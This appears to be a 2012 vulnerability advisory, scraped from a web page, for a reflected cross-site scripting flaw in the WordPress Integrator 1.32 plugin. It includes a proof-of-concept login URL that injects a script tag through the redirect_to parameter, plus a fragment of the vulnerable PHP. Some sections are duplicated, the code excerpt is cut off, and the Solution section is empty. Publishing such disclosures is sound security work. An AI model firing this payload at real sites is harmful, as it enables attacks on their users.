SSCHADV2012-010 - WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
Advisory:
|
WordPress plugin ‘WordPress Integrator 1.32’ XSS vulnerability
|
Advisory ID: | SSCHADV2012-010 |
Author: | Stefan Schurtz |
Affected Software: | Successfully tested on WordPress Integrator 1.32 |
Vendor URL: | |
Vendor Status: |
informed
|
OSVDB ID:
|
80628
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The WordPress plugin ‘WordPress Integrator 1.32’ is prone to Cross-Site scripting vulnerability
==============
PoC-Exploit
==============
http://[target]/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>
PoC-Exploit
==============
http://[target]/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>
// vulnerable code in wp-integrator.php
function init_handler() {
$url = parse_url($_SERVER["REQUEST_URI"]);
$url = parse_url($_SERVER["REQUEST_URI"]);
=====
Solution
=====
================
Disclosure Timeline
================
19-Mar-2012 – vendor informed
20-Mar-2012 – informed plugins@wordpress.org
Disclosure Timeline
================
19-Mar-2012 – vendor informed
20-Mar-2012 – informed plugins@wordpress.org
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
Comments
Display comments as Linear | Threaded